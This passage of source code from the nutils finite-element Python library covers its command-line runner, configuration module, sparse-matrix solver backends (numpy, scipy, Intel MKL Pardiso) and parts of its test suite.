'NfNAeWPESU=')
nutils.numeric.assert_allclose64(lhs, 'eNoBMgDN/7Ed9eB+IfLboCaXNKc01DQaNXM14j'
'XyNR82ZTa+NpI2oTbPNhU3bjf7Ngo3ODd+N9c3SNEU1g==')
numpy.testing.assert_almost_equal(err, 1.63e-3, decimal=5)
@nutils.testing.requires('matplotlib')
def test_spline(self):
cons, lhs, err = main(nelems=4, etype='square', btype='spline', degree=2)
nutils.numeric.assert_allclose64(cons, 'eNqrkmN+sEfhzF0xleRbDA0wKGeCYFuaIdjK5'
'gj2aiT2VXMAJB0VAQ==')
nutils.numeric.assert_allclose64(lhs, 'eNqrkmN+sEfhzF0xleRbrsauxsnGc43fGMuZJJ'
'gmmNaZ7jBlN7M08wLCDLNFZh/NlM0vmV0y+2CmZV5pvtr8j9kfMynzEPPF5lfNAcuhGvs=')
numpy.testing.assert_almost_equal(err, 8.04e-5, decimal=7)
@nutils.testing.requires('matplotlib')
def test_mixed(self):
cons, lhs, err = main(nelems=4, etype='mixed', btype='std', degree=2)
nutils.numeric.assert_allclose64(cons, 'eNorfLZF2ucJQwMC3pR7+QDG9lCquAtj71Rlu'
'8XQIGfC0FBoiqweE1qaMTTsNsOvRtmcoSHbHL+a1UD5q+YAxhcu1g==')
nutils.numeric.assert_allclose64(lhs, 'eNorfLZF2ueJq7GrcYjxDJPpJstNbsq9fOBr3G'
'h8xWS7iYdSxd19xseMP5hImu5UZbv1xljOxM600DTWNN/0k2mC6SPTx6Z1pnNMGc3kzdaaPjRN'
'MbMyEzWzNOsy223mBYRRZpPNJpktMks1azM7Z7bRbIXZabNXZiLmH82UzS3Ns80vmj004za/ZP'
'YHCD+Y8ZlLmVuYq5kHm9eahwDxavPF5lfNAWFyPdk=')
numpy.testing.assert_almost_equal(err, 1.25e-4, decimal=6)
```
#### File: nutils/nutils/cli.py
```python
from . import util, config, long_version, warnings, matrix, cache
import sys, inspect, os, io, time, pdb, signal, subprocess, contextlib, traceback, pathlib, html, treelog as log, stickybar
def _version():
try:
githash = subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'], universal_newlines=True, stderr=subprocess.DEVNULL, cwd=os.path.dirname(__file__)).strip()
if subprocess.check_output(['git', 'status', '--untracked-files=no', '--porcelain'], stderr=subprocess.DEVNULL, cwd=os.path.dirname(__file__)):
githash += '+'
except:
return long_version
else:
return '{} (git:{})'.format(long_version, githash)
def _mkbox(*lines):
width = max(len(line) for line in lines)
ul, ur, ll, lr, hh, vv = '┌┐└┘─│' if config.richoutput else '++++-|'
return '\n'.join([ul + hh * (width+2) + ur]
+ [vv + (' '+line).ljust(width+2) + vv for line in lines]
+ [ll + hh * (width+2) + lr])
def _sigint_handler(mysignal, frame):
_handler = signal.signal(mysignal, signal.SIG_IGN) # temporarily disable handler
try:
while True:
answer = input('interrupted. quit, continue or start debugger? [q/c/d]')
if answer == 'q':
raise KeyboardInterrupt
if answer == 'c' or answer == 'd':
break
if answer == 'd': # after break, to minimize code after set_trace
print(_mkbox(
'TRACING ACTIVATED. Use the Python debugger',
'to step through the code at source line',
'level, list source code, set breakpoints,',
'and evaluate arbitrary Python code in the',
'context of any stack frame. Type "h" for',
'an overview of commands to get going, or',
'"c" to continue uninterrupted execution.'))
pdb.set_trace()
finally:
signal.signal(mysignal, _handler)
def _hms(dt):
seconds = int(dt)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return hours, minutes, seconds
def run(func, *, skip=1, loaduserconfig=True):
'''parse command line arguments and call function'''
configs = []
if loaduserconfig:
home = os.path.expanduser('~')
configs.append(dict(richoutput=sys.stdout.isatty()))
configs.extend(path for path in (os.path.join(home, '.config', 'nutils', 'config'), os.path.join(home, '.nutilsrc')) if os.path.isfile(path))
params = inspect.signature(func).parameters.values()
if '-h' in sys.argv[skip:] or '--help' in sys.argv[skip:]:
print('usage: {} (...)'.format(' '.join(sys.argv[:skip])))
print()
for param in params:
cls = param.default.__class__
print(' --{:<20}'.format(param.name + '=' + cls.__name__.upper() if cls != bool else '(no)' + param.name), end=' ')
if param.annotation != param.empty:
print(param.annotation, end=' ')
print('[{}]'.format(param.default))
sys.exit(1)
kwargs = {param.name: param.default for param in params}
cli_config = {}
for arg in sys.argv[skip:]:
name, sep, value = arg.lstrip('-').partition('=')
if not sep:
value = not name.startswith('no')
if not value:
name = name[2:]
if name in kwargs:
default = kwargs[name]
args = kwargs
else:
try:
default = getattr(config, name)
except AttributeError:
print('invalid argument {!r}'.format(arg))
sys.exit(2)
args = cli_config
try:
if isinstance(default, bool) and not isinstance(value, bool):
raise Exception('boolean value should be specifiec as --{0}/--no{0}'.format(name))
args[name] = default.__class__(value)
except Exception as e:
print('invalid argument for {!r}: {}'.format(name, e))
sys.exit(2)
with config(*configs, **cli_config):
status = call(func, kwargs, scriptname=os.path.basename(sys.argv[0]), funcname=None if skip==1 else func.__name__)
sys.exit(status)
def choose(*functions, loaduserconfig=True):
'''parse command line arguments and call one of multiple functions'''
assert functions, 'no functions specified'
funcnames = [func.__name__ for func in functions]
if len(sys.argv) == 1 or sys.argv[1] in ('-h', '--help'):
print('usage: {} [{}] (...)'.format(sys.argv[0], '|'.join(funcnames)))
sys.exit(1)
try:
ifunc = funcnames.index(sys.argv[1])
except ValueError:
print('invalid argument {!r}; choose from {}'.format(sys.argv[1], ', '.join(funcnames)))
sys.exit(2)
run(functions[ifunc], skip=2, loaduserconfig=loaduserconfig)
def call(func, kwargs, scriptname, funcname=None):
'''set up compute environment and call function'''
outdir = config.outdir or os.path.join(os.path.expanduser(config.outrootdir), scriptname)
with contextlib.ExitStack() as stack:
stack.enter_context(cache.enable(os.path.join(outdir, config.cachedir)) if config.cache else cache.disable())
stack.enter_context(matrix.backend(config.matrix))
stack.enter_context(log.set(log.FilterLog(log.RichOutputLog() if config.richoutput else log.StdoutLog(), minlevel=5-config.verbose)))
if config.htmloutput:
htmllog = stack.enter_context(log.HtmlLog(outdir, title=scriptname, htmltitle='<a href="http://www.nutils.org">{}</a> {}'.format(SVGLOGO, html.escape(scriptname)), favicon=FAVICON))
uri = (config.outrooturi.rstrip('/') + '/' + scriptname if config.outrooturi else pathlib.Path(outdir).resolve().as_uri()) + '/' + htmllog.filename
if config.richoutput:
t0 = time.perf_counter()
bar = lambda running: '{0} [{1}] {2[0]}:{2[1]:02d}:{2[2]:02d}'.format(uri, 'RUNNING' if running else 'STOPPED', _hms(time.perf_counter()-t0))
stack.enter_context(stickybar.activate(bar, update=1))
else:
log.info('opened log at', uri)
htmllog.write('<ul style="list-style-position: inside; padding-left: 0px; margin-top: 0px;">{}</ul>'.format(''.join(
'<li>{}={} <span style="color: gray;">{}</span></li>'.format(param.name, kwargs.get(param.name, param.default), param.annotation)
for param in inspect.signature(func).parameters.values())), level=1, escape=False)
stack.enter_context(log.add(htmllog))
stack.enter_context(warnings.via(log.warning))
stack.callback(signal.signal, signal.SIGINT, signal.signal(signal.SIGINT, _sigint_handler))
log.info('nutils v{}'.format(_version()))
log.info('start', time.ctime())
try:
func(**kwargs)
except (KeyboardInterrupt, SystemExit, pdb.bdb.BdbQuit):
log.error('killed by user')
return 1
except:
log.error(traceback.format_exc())
if config.pdb:
print(_mkbox(
'YOUR PROGRAM HAS DIED. The Python debugger',
'allows you to examine its post-mortem state',
'to figure out why this happened. Type "h"',
'for an overview of commands to get going.'))
pdb.post_mortem()
return 2
else:
log.info('finish', time.ctime())
return 0
SVGLOGO = '''\
<svg style="vertical-align: middle;" width="32" height="32" xmlns="http://www.w3.org/2000/svg">
<path d="M7.5 19 v-6 a6 6 0 0 1 12 0 v6 M25.5 13 v6 a6 6 0 0 1 -12 0 v-6" fill="none" stroke-width="3" stroke-linecap="round"/>
</svg>'''
FAVICON = 'data:image/png;base64,' \
'iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAACAElEQVRYw+2YS04bQRCGP2wJ' \
'gbAimS07WABXGMLzAgiBcgICFwDEEiGiDCScggWPHVseC1AIZ8AIJBA2hg1kF5DiycLYqppp' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'XU6ppH81Etp/wL7MKaEwo4sAAAAASUVORK5CYII='
# vim:sw=2:sts=2:et
```
#### File: nutils/nutils/config.py
```python
import types, contextlib, sys
def load_rcfile(path):
settings = {}
try:
with open(path) as rc:
exec(rc.read(), {}, settings)
except Exception as e:
raise Exception('error loading config from {}'.format(path)) from e
return settings
class Config(types.ModuleType):
'''
This module holds the Nutils global configuration, stored as (immutable)
attributes. To inspect the current configuration, use :func:`print` or
:func:`vars` on this module. The configuration can be changed temporarily by
calling this module with the new settings passed as keyword arguments and
entering the returned context. The old settings are restored as soon as the
context is exited. Example:
>>> from nutils import config
>>> config.verbose
4
>>> with config(verbose=2, nprocs=4):
... # The configuration has been updated.
... config.verbose
2
>>> # Exiting the context reverts the changes:
>>> config.verbose
4
.. Note::
The default entry point for Nutils scripts :func:`nutils.cli.run` (and
:func:`nutils.cli.choose`) will read user configuration from disk.
.. Important::
The configuration is not thread-safe: changing the configuration inside a
thread changes the process wide configuration.
The following configuration properties are used in Nutils.
.. attribute:: nprocs
Controls the number of processes to use for computing integrals
(:meth:`nutils.topology.Topology.integrate`) and a few other expensive and
parallelizable functions.
Defaults to ``1``.
.. attribute:: verbose
Controls the level of verbosity of loggers. Log entries with a level
higher than :attr:`verbose` are omitted. The levels are ``1``: error,
``2``: warning, ``3``: user, ``4``: info and ``5``: debug.
Defaults to ``4``: info.
.. attribute:: dot
If ``True``, :meth:`nutils.sample.Sample.integrate` and
:meth:nutils.sample.Sample.eval` log a visualization of the function tree
that is being evaluated or integrated.
Defaults to ``False``.
The following properties are only used in :func:`nutils.cli.run` and
:func:`nutils.cli.choose`.
.. attribute:: outrootdir
Defines the root directory for general output.
Defaults to ``'~/public_html'``
.. attribute:: outdir
Defines the output directory for the HTML log and plots. Relative paths
are relative with respect to the current working directory (see
:func:`os.getcwd`).
Defaults to ``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>'``
.. attribute:: cache
Controls on-disk caching. If ``True``, functions decorated with
:func:`nutils.cache.function` (e.g.
:meth:`nutils.topology.Topology.integrate`) and subclasses of
:class:`nutils.cache.Recursion` (e.g. :class:`nutils.solver.thetamethod`)
are automatically cached.
Defaults to ``False``.
.. attribute:: cachedir
Defines the location of the on-disk cache (see :attr:`cache`) relative to
``<outrootdir>/<scriptname>``.
Defaults to ``'cache'``.
.. attribute:: symlink
If not empty, the symlinks ``'<outrootdir>/<symlink>'`` and
``'<outrootdir>/<scriptname>/<symlink>'`` will be created, both pointing
to ``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>'``.
Defaults to ``''``.
.. attribute:: richoutput
Controls whether or not the console logger should output rich text or
plain text.
Defaults to ``True`` if ``sys.stdout`` is attached to a terminal (i.e.
``sys.stdout.isatty()`` returns true), otherwise ``False``.
.. attribute:: htmloutput
If ``True`` the HTML logger is enabled and written to
``'<outrootdir>/<scriptname>/<YY/MM/DD/HH-MM-SS>/log.html'``
Defaults to ``True``.
.. attribute:: pdb
If ``True`` the debugger will be invoked when an exception reaches
:func:`nutils.cli.run` or :func:`nutils.cli.choose`.
Defaults to ``False``.
.. attribute:: matrix
A comma-separated list of matrix backends. The first one available is
activated. The names — the case is irrelevant – correspond to subclasses
of :class:`nutils.matrix.Backend`. Use
``nutils.matrix.Backend.__subclasses__()`` to list the available backends.
Defauls to ``'mkl,scipy,numpy'``.
'''
def __init__(*args, **data):
self, name = args
super(Config, self).__init__(name, self.__doc__)
self.__dict__.update(data)
def __setattr__(self, k, v):
raise AttributeError('readonly attribute: {}'.format(k))
def __delattr__(self, k):
raise AttributeError('readonly attribute: {}'.format(k))
@contextlib.contextmanager
def __call__(*args, **data):
if len(args) < 1:
raise TypeError('__call__ takes at least 1 positional argument but none were given')
self, *configs = args
configs.append(data)
old = self.__dict__.copy()
try:
for config in configs:
self.__dict__.update(config if isinstance(config, dict) else load_rcfile(config))
yield
finally:
self.__dict__.clear()
self.__dict__.update(old)
def __str__(self):
return 'configuration: {}'.format(', '.join('{}={!r}'.format(k, v) for k, v in sorted(self.__dict__.items()) if not k.startswith('_')))
sys.modules[__name__] = Config(
__name__,
nprocs = 1,
outrootdir = '~/public_html',
outrooturi = None,
outdir = '',
verbose = 4,
richoutput = False,
htmloutput = True,
pdb = False,
symlink = '',
dot = False,
cachedir = 'cache',
matrix = 'mkl,scipy,numpy',
cache = False,
)
# vim:sw=2:sts=2:et
```
#### File: nutils/nutils/matrix.py
```python
from . import numpy, numeric, warnings, cache, types, config, util
import abc, sys, ctypes, treelog as log
class MatrixError(Exception): pass
class Backend(metaclass=abc.ABCMeta):
'backend base class'
def __enter__(self):
if hasattr(self, '_old_backend'):
raise RuntimeError('This context manager is not reentrant.')
global _current_backend
self._old_backend = _current_backend
_current_backend = self
return self
def __exit__(self, etype, value, tb):
if not hasattr(self, '_old_backend'):
raise RuntimeError('This context manager is not yet entered.')
global _current_backend
_current_backend = self._old_backend
del self._old_backend
@abc.abstractmethod
def assemble(self, data, index, shape):
'''Assemble a (sparse) tensor based on index-value pairs.
.. Note:: This function is abstract.
'''
class Matrix(metaclass=types.CacheMeta):
'matrix base class'
def __init__(self, shape):
assert len(shape) == 2
self.shape = shape
@abc.abstractmethod
def __add__(self, other):
'add two matrices'
@abc.abstractmethod
def __mul__(self, other):
'multiply matrix with a scalar'
@abc.abstractmethod
def __neg__(self, other):
'negate matrix'
def __sub__(self, other):
return self.__add__(-other)
def __rmul__(self, other):
return self.__mul__(other)
def __truediv__(self, other):
return self.__mul__(1/other)
@property
@abc.abstractmethod
def T(self):
'transpose matrix'
@property
def size(self):
return numpy.prod(self.shape)
def rowsupp(self, tol=0):
'return row indices with nonzero/non-small entries'
data, (row, col) = self.export('coo')
supp = numpy.zeros(self.shape[0], dtype=bool)
supp[row[abs(data) > tol]] = True
return supp
@abc.abstractmethod
def solve(self, rhs=None, *, lhs0=None, constrain=None, rconstrain=None, **solverargs):
'''Solve system given right hand side vector and/or constraints.
Args
----
rhs : :class:`float` vector or :any:`None`
Right hand side vector. `None` implies all zeros.
lhs0 : class:`float` vector or :any:`None`
Initial values. `None` implies all zeros.
constrain : :class:`float` or :class:`bool` array, or :any:`None`
Column constraints. For float values, a number signifies a constraint,
NaN signifies a free dof. For boolean, a True value signifies a
constraint to the value in `lhs0`, a False value signifies a free dof.
`None` implies no constraints.
rconstrain : :class:`bool` array or :any:`None`
Row constrains. A True value signifies a constrains, a False value a free
dof. `None` implies that the constraints follow those defined in
`constrain` (by implication the matrix must be square).
Returns
-------
:class:`numpy.ndarray`
Left hand side vector.
'''
@abc.abstractmethod
def submatrix(self, rows, cols):
'''Create submatrix from selected rows, columns.
Args
----
rows : :class:`bool`/:class:`int` array selecting rows for keeping
cols : :class:`bool`/:class:`int` array selecting columns for keeping
Returns
-------
:class:`Matrix`
Matrix instance of reduced dimensions
'''
def export(self, form):
'''Export matrix data to any of supported forms.
Args
----
form : :class:`str`
- "dense" : return matrix as a single dense array
- "csr" : return matrix as 3-tuple of (data, indices, indptr)
- "coo" : return matrix as 2-tuple of (data, (row, col))
'''
raise NotImplementedError('cannot export {} to {!r}'.format(self.__class__.__name__, form))
def __repr__(self):
return '{}<{}x{}>'.format(type(self).__qualname__, *self.shape)
def preparesolvearguments(wrapped):
'''Make rhs optional, add lhs0, constrain, rconstrain arguments.
See Matrix.solve.'''
def solve(self, rhs=None, *, lhs0=None, constrain=None, rconstrain=None, **solverargs):
nrows, ncols = self.shape
if lhs0 is None:
x = numpy.zeros(ncols)
else:
x = numpy.array(lhs0, dtype=float)
assert x.shape == (ncols,)
if constrain is None:
J = numpy.ones(ncols, dtype=bool)
else:
assert constrain.shape == (ncols,)
if constrain.dtype == bool:
J = ~constrain
else:
J = numpy.isnan(constrain)
x[~J] = constrain[~J]
if rconstrain is None:
assert nrows == ncols
I = J
else:
assert rconstrain.shape == (nrows,) and constrain.dtype == bool
I = ~rconstrain
assert I.sum() == J.sum(), 'constrained matrix is not square: {}x{}'.format(I.sum(), J.sum())
if rhs is None:
rhs = 0.
b = (rhs - self.matvec(x))[J]
if b.any():
x[J] += wrapped(self if I.all() and J.all() else self.submatrix(I, J), b, **solverargs)
if not numpy.isfinite(x).all():
raise MatrixError('solver returned non-finite left hand side')
log.info('solver returned with residual {:.0e}'.format(numpy.linalg.norm((rhs - self.matvec(x))[J])))
else:
log.info('skipping solver because initial vector is exact')
return x
return log.withcontext(solve)
## NUMPY BACKEND
class Numpy(Backend):
'''matrix backend based on numpy array'''
def assemble(self, data, index, shape):
array = numeric.accumulate(data, index, shape)
return NumpyMatrix(array) if len(shape) == 2 else array
class NumpyMatrix(Matrix):
'''matrix based on numpy array'''
def __init__(self, core):
assert numeric.isarray(core)
self.core = core
super().__init__(core.shape)
def __add__(self, other):
if not isinstance(other, NumpyMatrix) or self.shape != other.shape:
return NotImplemented
return NumpyMatrix(self.core + other.core)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return NumpyMatrix(self.core * other)
def __neg__(self):
return NumpyMatrix(-self.core)
@property
def T(self):
return NumpyMatrix(self.core.T)
def matvec(self, vec):
return numpy.dot(self.core, vec)
def export(self, form):
if form == 'dense':
return self.core
if form == 'coo':
ij = self.core.nonzero()
return self.core[ij], ij
if form == 'csr':
rows, cols = self.core.nonzero()
return self.core[rows, cols], cols, rows.searchsorted(numpy.arange(self.shape[0]+1))
raise NotImplementedError('cannot export NumpyMatrix to {!r}'.format(form))
def rowsupp(self, tol=0):
return numpy.greater(abs(self.core), tol).any(axis=1)
@preparesolvearguments
def solve(self, rhs):
try:
return numpy.linalg.solve(self.core, rhs)
except numpy.linalg.LinAlgError as e:
raise MatrixError(e) from e
def submatrix(self, rows, cols):
return NumpyMatrix(self.core[numpy.ix_(rows, cols)])
## SCIPY BACKEND
try:
import scipy.sparse.linalg
except ImportError:
pass
else:
class Scipy(Backend):
'''matrix backend based on scipy's sparse matrices'''
def assemble(self, data, index, shape):
if len(shape) < 2:
return numeric.accumulate(data, index, shape)
if len(shape) == 2:
csr = scipy.sparse.csr_matrix((data, index), shape)
return ScipyMatrix(csr)
raise MatrixError('{}d data not supported by scipy backend'.format(len(shape)))
class ScipyMatrix(Matrix):
'''matrix based on any of scipy's sparse matrices'''
def __init__(self, core):
self.core = core
super().__init__(core.shape)
def __add__(self, other):
if not isinstance(other, ScipyMatrix) or self.shape != other.shape:
return NotImplemented
return ScipyMatrix(self.core + other.core)
def __sub__(self, other):
if not isinstance(other, ScipyMatrix) or self.shape != other.shape:
return NotImplemented
return ScipyMatrix(self.core - other.core)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return ScipyMatrix(self.core * other)
def __neg__(self):
return ScipyMatrix(-self.core)
def matvec(self, vec):
return self.core.dot(vec)
def export(self, form):
if form == 'dense':
return self.core.toarray()
if form == 'csr':
csr = self.core.tocsr()
return csr.data, csr.indices, csr.indptr
if form == 'coo':
coo = self.core.tocoo()
return coo.data, (coo.row, coo.col)
raise NotImplementedError('cannot export NumpyMatrix to {!r}'.format(form))
@property
def T(self):
return ScipyMatrix(self.core.transpose())
@preparesolvearguments
def solve(self, rhs, atol=0, solver='spsolve', callback=None, precon=None, **solverargs):
if solver == 'spsolve':
log.info('solving system using sparse direct solver')
return scipy.sparse.linalg.spsolve(self.core, rhs)
assert atol, 'tolerance must be specified for iterative solver'
rhsnorm = numpy.linalg.norm(rhs)
if rhsnorm <= atol:
return numpy.zeros(self.shape[1])
log.info('solving system using {} iterative solver'.format(solver))
solverfun = getattr(scipy.sparse.linalg, solver)
myrhs = rhs / rhsnorm # normalize right hand side vector for best control over scipy's stopping criterion
mytol = atol / rhsnorm
niter = numpy.array(0)
def mycallback(arg):
niter[...] += 1
# some solvers provide the residual, others the left hand side vector
res = numpy.linalg.norm(myrhs - self.matvec(arg)) if numpy.ndim(arg) == 1 else float(arg)
if callback:
callback(res)
with log.context('residual {:.2e} ({:.0f}%)'.format(res, 100. * numpy.log10(res) / numpy.log10(mytol) if res > 0 else 0)):
pass
M = self.getprecon(precon) if isinstance(precon, str) else precon(self.core) if callable(precon) else precon
mylhs, status = solverfun(self.core, myrhs, M=M, tol=mytol, callback=mycallback, **solverargs)
if status != 0:
raise MatrixError('{} solver failed with status {}'.format(solver, status))
log.info('solver converged in {} iterations'.format(niter))
return mylhs * rhsnorm
def getprecon(self, name):
name = name.lower()
assert self.shape[0] == self.shape[1], 'constrained matrix must be square'
log.info('building {} preconditioner'.format(name))
if name == 'splu':
try:
precon = scipy.sparse.linalg.splu(self.core.tocsc()).solve
except RuntimeError as e:
raise MatrixError(e) from e
elif name == 'spilu':
try:
precon = scipy.sparse.linalg.spilu(self.core.tocsc(), drop_tol=1e-5, fill_factor=None, drop_rule=None, permc_spec=None, diag_pivot_thresh=None, relax=None, panel_size=None, options=None).solve
except RuntimeError as e:
raise MatrixError(e) from e
elif name == 'diag':
diag = self.core.diagonal()
if not diag.all():
raise MatrixError("building 'diag' preconditioner: diagonal has zero entries")
precon = numpy.reciprocal(diag).__mul__
else:
raise MatrixError('invalid preconditioner {!r}'.format(name))
return scipy.sparse.linalg.LinearOperator(self.shape, precon, dtype=float)
def submatrix(self, rows, cols):
return ScipyMatrix(self.core[rows,:][:,cols])
## INTEL MKL BACKEND
libmkl = util.loadlib(linux='libmkl_rt.so', darwin='libmkl_rt.dylib', win32='mkl_rt.dll')
if libmkl is not None:
# typedefs
c_int = types.c_array[numpy.int32]
c_long = types.c_array[numpy.int64]
c_double = types.c_array[numpy.float64]
libtbb = util.loadlib(linux='libtbb.so.2', darwin='libtbb.dylib', win32='tbb.dll')
class MKL(Backend):
'''matrix backend based on Intel's Math Kernel Library'''
def __enter__(self):
super().__enter__()
usethreads = config.nprocs > 1
libmkl.mkl_set_threading_layer(c_long(4 if usethreads else 1)) # 1:SEQUENTIAL, 4:TBB
if usethreads and libtbb:
self.tbbhandle = ctypes.c_void_p()
libtbb._ZN3tbb19task_scheduler_init10initializeEim(ctypes.byref(self.tbbhandle), ctypes.c_int(config.nprocs), ctypes.c_int(2))
else:
self.tbbhandle = None
return self
def __exit__(self, etype, value, tb):
if self.tbbhandle:
libtbb._ZN3tbb19task_scheduler_init9terminateEv(ctypes.byref(self.tbbhandle))
super().__exit__(etype, value, tb)
@staticmethod
def assemble(data, index, shape):
if len(shape) < 2:
return numeric.accumulate(data, index, shape)
if len(shape) == 2:
return MKLMatrix(data, index, shape)
raise MatrixError('{}d data not supported by scipy backend'.format(len(shape)))
class Pardiso:
'''simple wrapper for libmkl.pardiso
https://software.intel.com/en-us/mkl-developer-reference-c-pardiso
'''
_pardiso = libmkl.pardiso
_errorcodes = {
-1: 'input inconsistent',
-2: 'not enough memory',
-3: 'reordering problem',
-4: 'zero pivot, numerical factorization or iterative refinement problem',
-5: 'unclassified (internal) error',
-6: 'reordering failed (matrix types 11 and 13 only)',
-7: 'diagonal matrix is singular',
-8: '32-bit integer overflow problem',
-9: 'not enough memory for OOC',
-10: 'error opening OOC files',
-11: 'read/write error with OOC files',
-12: 'pardiso_64 called from 32-bit library',
}
def __init__(self):
self.pt = numpy.zeros(64, numpy.int64) # handle to data structure
@types.apply_annotations
def __call__(self, *, phase:c_int, iparm:c_int, maxfct:c_int=1, mnum:c_int=1, mtype:c_int=0, n:c_int=0, a:c_double=None, ia:c_int=None, ja:c_int=None, perm:c_int=None, nrhs:c_int=0, msglvl:c_int=0, b:c_double=None, x:c_double=None):
error = ctypes.c_int32(1)
self._pardiso(self.pt.ctypes, maxfct, mnum, mtype, phase, n, a, ia, ja, perm, nrhs, iparm, msglvl, b, x, ctypes.byref(error))
if error.value:
raise MatrixError(self._errorcodes.get(error.value, 'unknown error {}'.format(error.value)))
def __del__(self):
if self.pt.any(): # release all internal memory for all matrices
self(phase=-1, iparm=numpy.zeros(64, dtype=numpy.int32))
assert not self.pt.any(), 'it appears that Pardiso failed to release its internal memory'
class MKLMatrix(Matrix):
'''matrix implementation based on sorted coo data'''
__cache__ = 'indptr',
_factors = False
def __init__(self, data, index, shape):
assert index.shape == (2, len(data))
if len(data):
# sort rows, columns
reorder = numpy.lexsort(index[::-1])
index = index[:,reorder]
data = data[reorder]
# sum duplicate entries
keep = numpy.empty(len(reorder), dtype=bool)
keep[0] = True
numpy.not_equal(index[:,1:], index[:,:-1]).any(axis=0, out=keep[1:])
if not keep.all():
index = index[:,keep]
data = numeric.accumulate(data, [keep.cumsum()-1], [index.shape[1]])
if not data.all():
nz = data.astype(bool)
data = data[nz]
index = index[:,nz]
self.data = numpy.ascontiguousarray(data, dtype=numpy.float64)
self.index = numpy.ascontiguousarray(index, dtype=numpy.int32)
super().__init__(shape)
@property
def indptr(self):
return self.index[0].searchsorted(numpy.arange(self.shape[0]+1)).astype(numpy.int32, copy=False)
def __add__(self, other):
if not isinstance(other, MKLMatrix) or self.shape != other.shape:
return NotImplemented
return MKLMatrix(numpy.concatenate([self.data, other.data]), numpy.concatenate([self.index, other.index], axis=1), self.shape)
def __sub__(self, other):
if not isinstance(other, MKLMatrix) or self.shape != other.shape:
return NotImplemented
return MKLMatrix(numpy.concatenate([self.data, -other.data]), numpy.concatenate([self.index, other.index], axis=1), self.shape)
def __mul__(self, other):
if not numeric.isnumber(other):
return NotImplemented
return MKLMatrix(self.data * other, self.index, self.shape)
def __neg__(self):
return MKLMatrix(-self.data, self.index, self.shape)
@property
def T(self):
return MKLMatrix(self.data, self.index[::-1], self.shape[::-1])
def matvec(self, vec):
rows, cols = self.index
return numeric.accumulate(self.data * vec[cols], [rows], [self.shape[0]])
def export(self, form):
if form == 'dense':
return numeric.accumulate(self.data, self.index, self.shape)
if form == 'csr':
return self.data, self.index[1], self.indptr
if form == 'coo':
return self.data, self.index
raise NotImplementedError('cannot export MKLMatrix to {!r}'.format(form))
def submatrix(self, rows, cols):
I, J = self.index
keep = numpy.logical_and(rows[I], cols[J])
csI = rows.cumsum()
csJ = cols.cumsum()
return MKLMatrix(self.data[keep], numpy.array([csI[I[keep]]-1, csJ[J[keep]]-1]), shape=(csI[-1], csJ[-1]))
@preparesolvearguments
def solve(self, rhs):
log.info('solving {0}x{0} system using MKL Pardiso'.format(self.shape[0]))
if self._factors:
log.info('reusing existing factorization')
pardiso, iparm, mtype = self._factors
phase = 33 # solve, iterative refinement
else:
pardiso = Pardiso()
iparm = numpy.zeros(64, dtype=numpy.int32) # https://software.intel.com/en-us/mkl-developer-reference-c-pardiso-iparm-parameter
iparm[0] = 1 # supply all values in components iparm[1:64]
iparm[1] = 2 # fill-in reducing ordering for the input matrix: nested dissection algorithm from the METIS package
iparm[9] = 13 # pivoting perturbation threshold 1e-13 (default for nonsymmetric)
iparm[10] = 1 # enable scaling vectors (default for nonsymmetric)
iparm[12] = 1 # enable improved accuracy using (non-) symmetric weighted matching (default for nonsymmetric)
iparm[34] = 1 # zero base indexing
mtype = 11 # real and nonsymmetric
phase = 13 # analysis, numerical factorization, solve, iterative refinement
self._factors = pardiso, iparm, mtype
lhs = numpy.empty(self.shape[1], dtype=numpy.float64)
pardiso(phase=phase, mtype=mtype, iparm=iparm, n=self.shape[0], nrhs=1, b=rhs, x=lhs, a=self.data, ia=self.indptr, ja=self.index[1])
return lhs
## MODULE METHODS
_current_backend = Numpy()
def backend(names):
for name in names.lower().split(','):
for cls in Backend.__subclasses__():
if cls.__name__.lower() == name:
return cls()
raise RuntimeError('matrix backend {!r} is not available'.format(names))
def assemble(data, index, shape):
return _current_backend.assemble(data, index, shape)
def diag(d):
assert d.ndim == 1
return assemble(d, index=numpy.arange(len(d))[numpy.newaxis].repeat(2, axis=0), shape=d.shape*2)
def eye(n):
return diag(numpy.ones(n))
# vim:sw=2:sts=2:et
```
#### File: nutils/tests/test_types.py
```python
from nutils.testing import *
import nutils.types
import inspect, pickle, itertools, ctypes
import numpy
class apply_annotations(TestCase):
def test_without_annotations(self):
@nutils.types.apply_annotations
def f(a, b):
return a, b
a, b = f(1, 2)
self.assertEqual(a, 1)
self.assertEqual(b, 2)
def test_pos_or_kw(self):
@nutils.types.apply_annotations
def f(a:int, b, c:str):
return a, b, c
a, b, c = f(1, 2, 3)
self.assertEqual(a, 1)
self.assertEqual(b, 2)
self.assertEqual(c, '3')
def test_with_signature(self):
def f(a):
return a
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_OR_KEYWORD, annotation=str)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1), '1')
def test_posonly(self):
def f(a):
return a
f.__signature__ = inspect.Signature([inspect.Parameter('a', inspect.Parameter.POSITIONAL_ONLY, annotation=str)])
f = nutils.types.apply_annotations(f)
self.assertEqual(f(1), '1')
def test_kwonly(self):
@nutils.types.apply_annotations
def f(a:str, *, b:int, c:bool):
return a, b, c
self.assertEqual(f(1, b='2', c=3), ('1', 2, True))
def test_varpos(self):
@nutils.types.apply_annotations
def f(a:str, *args):
return a, args
self.assertEqual(f(1, 2, 3), ('1', (2, 3)))
def test_varpos_annotated(self):
map_str = lambda args: map(str, args)
@nutils.types.apply_annotations
def f(a:str, *args:map_str):
return a, args
self.assertEqual(f(1, 2, 3), ('1', ('2', '3')))
def test_varkw(self):
@nutils.types.apply_annotations
def f(a:str, **kwargs):
return a, kwargs
self.assertEqual(f(1, b=2, c=3), ('1', dict(b=2, c=3)))
def test_varkw_annotated(self):
map_str = lambda kwargs: {k: str(v) for k, v in kwargs.items()}
@nutils.types.apply_annotations
def f(a:str, **kwargs:map_str):
return a, kwargs
